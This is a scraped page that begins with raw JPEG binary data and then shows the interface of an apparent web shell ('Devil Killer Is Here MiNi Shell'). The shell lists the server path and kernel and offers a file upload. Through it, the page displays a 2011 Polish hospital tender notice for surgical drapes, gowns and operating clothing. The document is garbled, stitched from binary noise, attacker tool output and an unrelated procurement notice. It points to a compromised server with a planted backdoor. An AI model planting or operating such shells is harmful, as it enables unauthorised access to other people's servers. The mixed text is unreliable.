JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110309/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110309/39184-N-2011.html

<p class="kh_header"><b>Sucha Beskidzka: Przedmiotem zamówienia jest dostawa ubrań i obłożeń  
chirurgicznych z włókniny i flizeliny</b><br>
<b>Numer ogłoszenia: 39184 - 2011; data zamieszczenia: 09.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki  Zdrowotnej , ul. Szpitalna 22, 34-200 Sucha Beskidzka, woj. małopolskie, tel. (033) 872 31 11, faks (033) 872 31 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozsuchabeskidzka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest dostawa ubrań i obłożeń  
chirurgicznych z włókniny i flizeliny.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa ubrań i obłożeń  
chirurgicznych z włókniny i flizeliny określonych w pakietach 1-3.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1, 33.14.10.00-0, 33.77.20.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) posiadania wiedzy i doświadczenia,
W celu wykazania spełnienia warunku dotyczącego posiadania wiedzy i doświadczenia, Zamawiający wymaga, aby dostawca wykonał co najmniej dwie dostawy w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, odpowiadających swoim rodzajem dostawom stanowiącym przedmiot zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) dysponowania odpowiednim potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:

a) dysponowania  osobami zdolnymi do wykonania zamówienia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) sytuacji ekonomicznej i finansowej
W celu wykazania spełnienia warunku dotyczącego sytuacji ekonomicznej i finansowej spełnieniem będzie informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Dostawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Dostawcy na kwotę nie mniejszą niż 30% wartości oferty brutto.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień niniejszej umowy może być dokonana przez strony 
w formie pisemnej w drodze aneksu do niniejszej umowy, pod rygorem nieważności.
2.	Zmiany postanowień niniejszej umowy, są dopuszczalne wyłącznie w przypadku, gdy:
a)	nastąpiło obniżenie ceny jednostkowej asortymentu,
b)	nastąpila zmiana numeru katalogowego produktu
c)  sposobu konfekcjonowania
d) liczby opakowań
e) wystąpi przejściowy brak produktu z przyczyn leżacych po stronie producenta przy
   jednoczesnym dostarczeniu produktu zamiennego o parametrach nie gorszych od
   produktu objętego umową.
    f) zmiany stawki podatku VAT - związanej z przedmiotem umowy - w tym
       przypadku zmianie ulegnie kwota podatku VAT i cena brutto , cena netto
       pozostanie niezmienna, 
   g) w przypadku zmiany stawki podatku VAT w ramach niniejszej umowy zmiana
       stawki następuje z dniem wejścia w życie aktu prawnego zmieniającego stawkę, a
       w przypadku zmiany stawek celnych wystąpienie o zmianę wymaga
       udokumentowanej formy pisemnej i zgody Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozsuchabeskidzka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych
Zespół Opieki Zdrowotnej
ul. Szpitalna 22
34-200 Sucha Beskidzka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2011 godzina 10:00, miejsce: Sekretariat Zespołu Opieki Zdrowotnej
ul. Szpitalna 22
34-200 Sucha Beskidzka.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są wyroby określone w pakiecie nr 1:
Sterylna serweta włókninowa 3W 50x50 cm 	szt.	10500
Sterylna serweta włókninowa 3W 45x75 cm 	szt.	2000
Sterylna serweta włókninowa 3W 50x60cm z otworem 5 cm 	szt.	4500
Sterylna serweta włókninowa 3W 50x60cm z otworem samoprzylepnym 7cm	szt.	3500
Sterylna serweta włókninowa 2W samoprzylepna 75x90 cm 	szt.	400
Sterylna serweta włókninowa 2W 75x90 cm	szt.	700
Sterylna serweta włókninowa 2W 75x90 cm z regulowaną średnicą otworu	szt.	150
Sterylna serweta włókninowa 3W samoprzylepna 75x75cm	szt.	400
Sterylna serweta włókninowa 2W 90x150 cm	szt.	500
Sterylna serweta na stolik Mayo 80cm x 145cm	szt.	700
Sterylna serweta włókninowa 3W 150x175 cm 	szt.	300
Sterylna serweta włókninowa 3W samoprzylepna 50x50 cm 	szt.	300
Sterylna serweta włókninowa 3W samoprzylepna 45x75 cm 	szt.	400
Sterylna serweta włókninowa 3W 75x90 cm z otworem 5 cm 	szt.	100
Sterylna serweta włókninowa 3W 120x150 cm z otworem samoprzylepnym 7cm	szt.	200
Sterylny zestaw uniwersalny, serwet włókninowych 3W na całej powierzchni chłonność warstwy zewnętrznej min. 75%, odporność na penetrację płynów zgodnie z EN 20811>200 cm H2O, skład zestawu: 1 serweta na stolik narzędziowy 140x190cm; 1 obłożenie stolika Mayo złożone teleskopowo 80x145cm; 1 samoprzylepna serweta operacyjna 150x240cm; 1 samoprzylepna serweta operacyjna 200x175cm; 2 samoprzylepne serwety operacyjne 75x90cm; 1 taśma samoprzylepna 10x50cm; 4 ręczniki celulozowe min. 30x30cm	kpl	1600
Sterylny zestaw do zabiegów na kończynie, serwet wlókninowych 2W z dodatkowymi obszarami chłonnych wzmocnień chłonność min. 50%w obrębie pola operacyjnego, skład zestawu: 1 serweta na stolik narzedziowy 140x190cm wzmocnienie 75x190cm; 1 oblożenie stolika Mayo złożone teleskopowo 80x145cm wzmocnienie 60x80cm; 1 serweta do zabiegów na kończynie 320x245cm; 07x10cm wzmocnienie 150x105cm; 1 serweta pomocnicza 150x150cm; 1 osłona na kończynę 25x80cm; 2 taśmy samoprzylepne 10x50cm; 2 ręczniki celulozowe min. 30x30cm	kpl	600
Sterylny zestaw do chirurgii biodra, serwet wlókninowych 2W z dodatkowymi obszarami chlonnych wzmocnień chłonność min. 50% w obrebie pola operacyjnego, sklad zestawu: 1 serweta na stolik narzedziowy 140x190cm wzmocnienie 75x190cm; 1 oblozenie stolika Mayo zlozone teleskopowo 80x145cm wzmocnienie 60x80cm; 1 serweta samoprzylepna 170x300cm; 1 serweta samoprzylepna z wycieciem U 260x200cm, wyciecie U 6,5x90cm wzmocnienie 160x150cm; 1 serweta pomocnicza 150x150cm; 1 serweta operacyjna 75x90cm; 1 oslona na konczyne 35x120cm; 2 taśmy samoprzylepne 10x50cm; 4 reczniki celulozowe min. 30x30cm	kpl	300
Sterylny zestaw do cięcia cesarskiego, serwet włókninowych min. 2W, min. skład zestawu: 1 serweta na stolik narzedziowy 140x190cm; 1 obłożenie stolika Mayo zlożone teleskopowo 80x145cm; 1 serweta do cięcia cesarskiego 315x250cm z workiem zbierającym płyn; 1 serweta dla noworodka 90x100cm; 1 taśma samoprzylepna 10x50cm; 2 reczniki celulozowe min. 30x30cm	kpl	200
Sterylny zestaw do PCNL, serwet wlókninowych min. 2W, sklad zestawu: 1 serweta na stół instrumentariuszki 150x 200 cm. 1 serweta z otworem samoprzylepnym 15x20cm i workiem do zbiórki płynów 170 x 300 cm worek z sitem i zaworem	kpl	150
Sterylny zestaw do zabiegów urologicznych, serwet wlókninowych 2W , sklad zestawu: 1 serweta na stolik narzedziowy 140x190cm ,1 serweta urologiczna z torbą do zbierania płynów  z sitem 185x200cm z oknem 7x10 cm i na genitalia o średnicy 7 cm, 1 tasma samoprzylepna 10x50 cm, 2 ręczniki celulozowe min. 30x30 cm	kpl	20
Sterylny zestaw do chirurgii odbytnicy, serwet wlókninowych 2W z dodatkowymi obszarami chłonnych wzmocnień chłonność min. 50% w obrębie pola operacyjnego. Skład zestawu: 1 serweta na stolik narzędziowy 140x190cm wzmocnienie 75x190 cm, 1 obłożenie stolika Mayo złożone teleskopowo 80x145 cm wmocnienie 60x80 cm , 1 serweta operacyjna 75x90 cm, 1 serweta do chirurgii odbytnicy 300x250cm wzmocnienie 75x200cm, 90x60cm z oknem 28x32 cm, 1 taśma samoprzylepna 10x50 cm, 2 ręczniki celulozowe min. 30x30cm	kpl	20
Sterylny zestaw do artroskopii kolana, serwet wlókninowych 2W z workiem zbierajacym plyn, Sklad zestawu: 1 serweta na stolik narzedziowy 140x190cm, 1 oblozenie stolika Mayo złożone teleskopowo 80x145 cm, 1 serweta do artroskopii z workiem do zbiórki plynów 320x200 cm , 1 serweta pomocnicza 150x150 cm, 1 oslona na konczyne 25x80 cm, 2 tasmy samoprzylepne 10x50 cm, 2 reczniki celulozowe min. 30x30 cm	kpl	20
Sterylny zestaw porodowy, sklad zestawu: 1 serweta narzedziowa 100x150cm, 6 reczników celulozowych, 2 biale serwety dla noworodka 87x90cm, 2 serwety 45x75cm, 20 kompresów wlókninowych 10x10cm, 1 podklad nieprzemakalny z warstwą chlonnej celulozy 57x90cm, 1 tampon gazowy.	kpl	1200
Sterylny fartuch chirurgiczny wykonany z wlókniny polipropylenowej typu SMMS, szwy łączone ultradzwiekowo, rękaw zakonczony elast. mankietem z dzianiny, wiazany na troki łączone kartonikiem sterylne plecy zapinany na szyi na rzep, długość fartucha 115 cm, długość rękawa 69 - rozmiar M	szt.	1000
Sterylny fartuch chirurgiczny wykonany z wlókniny polipropylenowej typu SMMS, szwy łączone ultradzwiekowo, rękaw zakonczony elast. mankietem z dzianiny, wiazany na troki łaczone kartonikiem sterylne plecy zapinany na szyi na rzep, długość fartucha 130 cm, długość rękawa 77 cm - rozmiar L	szt.	2500
Sterylny fartuch chirurgiczny wykonany z wlókniny polipropylenowej typu SMMS, szwy łączone ultradzwiekowo, rękaw zakonczony elast. mankietem z dzianiny, wiazany na troki łaczone kartonikiem sterylne plecy zapinany na szyi na rzep, długość fartucha 150 cm, długość rękawa 88 cm - rozmiar XL	szt.	4500
Jednorazowy komplet operacyjny bluza i spodnie wykonany z włókniny polipropylenowej typu SMMS o gramaturze 45 gm2, kolor różowy, rozmiar M	szt.	1500
Jednorazowy komplet operacyjny bluza i spodnie wykonany z włókniny polipropylenowej typu SMMS o gramaturze 45 gm2, kolor zielony, rozmiar L	szt.	3500
Jednorazowy komplet operacyjny bluza i spodnie wykonany z włókniny polipropylenowej typu SMMS o gramaturze 45 gm2, kolor niebieski, rozmiar XL	szt.	4500
Jednorazowy komplet operacyjny bluza i spodnie wykonany z włókniny polipropylenowej typu SMMS o gramaturze 45 gm2, kolor niebieski, rozmiar XXL	szt.	1500
Osłona na kończyne długa 50 x 110 cm, a2 szt. 	kpl	20
Osłona na kończynę 25x80cm złożona teleskopowo z taśmą przylepną 10x50cm	kpl	200
Uchwyt typu rzep 2x23 cm	szt.	200
Osłona na stopę w kształcie buta wykonana z trójwarstwowej włókniny 40x22x8cm	szt.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1, 33.14.10.00-0, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Koszt kredytowania - 10</li>
<li>3. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
